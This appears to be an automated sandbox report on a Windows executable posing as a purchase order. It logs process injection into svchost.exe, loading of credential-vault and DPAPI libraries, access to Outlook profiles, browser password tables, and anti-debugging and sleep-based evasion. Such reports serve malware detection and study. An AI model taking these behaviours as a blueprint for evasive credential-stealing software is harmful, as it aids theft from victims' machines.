            Source: RMActivate_ssp.exe, 00000003.00000003.2105280358.0000000002931000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.0000000002931000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.2105173096.0000000002910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeReversingLabs: Detection: 26%
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeVirustotal: Detection: 33%
            Source: unknownProcess created: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"Jump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic file information: File size 1220608 > 1048576
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZQphKCYQofBW.exe, 00000002.00000002.3540260087.00000000004EE000.00000002.00000001.01000000.00000004.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945115829.00000000004EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003120F6 LoadLibraryA,GetProcAddress,0_2_003120F6
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0031C6CC push esi; ret 0_2_0031C6CE
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCB5D push edi; ret 0_2_002DCB5F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCC76 push esi; ret 0_2_002DCC78
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCE51 push esi; ret 0_2_002DCE53
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DCF3A push edi; ret 0_2_002DCF3C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D7795 push ecx; ret 0_2_002D77A8
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FBB9D push FFFFFF8Bh; iretd 0_2_002FBB9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003519A7 push es; retf 1_2_00351A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00358818 push edi; ret 1_2_003588A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00356005 push ds; ret 1_2_00356010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351A29 push es; retf 1_2_00351A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003644AE push ebx; iretd 1_2_003644AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00364CD3 push edi; iretd 1_2_00364CE1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351522 push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351566 push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0035159A push esi; iretd 1_2_003515F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003645E3 push edx; ret 1_2_00364605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003537A0 push eax; ret 1_2_003537A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00357784 push esi; iretd 1_2_0035779A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0036EF85 pushad ; ret 1_2_0036EF4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0035AF8E push ebp; retf 1_2_0035AFA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00356FD7 push cs; ret 1_2_00356FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_038863EC pushfd ; ret 2_2_03886447
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03884A19 push ebx; iretd 2_2_03884A1A
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03885238 push edi; iretd 2_2_0388524C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03878D83 push edi; ret 2_2_03878E0F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002CF78E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00317F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00317F0E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D1E5A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeAPI/Special instruction interceptor: Address: 3BC3224
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 9841Jump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeEvaded block: after key decisiongraph_0-103635
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeEvaded block: after key decisiongraph_0-104430
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104088
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552Thread sleep count: 132 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552Thread sleep time: -264000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552Thread sleep count: 9841 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 7552Thread sleep time: -19682000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe TID: 7636Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe TID: 7636Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_002CDD92
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00302044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00302044
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0030219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0030219F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003024A9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_002F6B3F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_002F6E4A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002FF350
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FFD47 FindFirstFileW,FindClose,0_2_002FFD47
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002FFDD2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025AC380 FindFirstFileW,FindNextFileW,FindClose,3_2_025AC380
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002CE47B
            Source: ZQphKCYQofBW.exe, 00000007.00000002.3541042170.00000000012CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
            Source: firefox.exe, 00000008.00000002.2215915696.0000026B41D5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeAPI call chain: ExitProcess graph end nodegraph_0-103437
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00367A93 LdrLoadDll,1_2_00367A93
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0030703C BlockInput,0_2_0030703C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_002B374E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_002E46D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003120F6 LoadLibraryA,GetProcAddress,0_2_003120F6
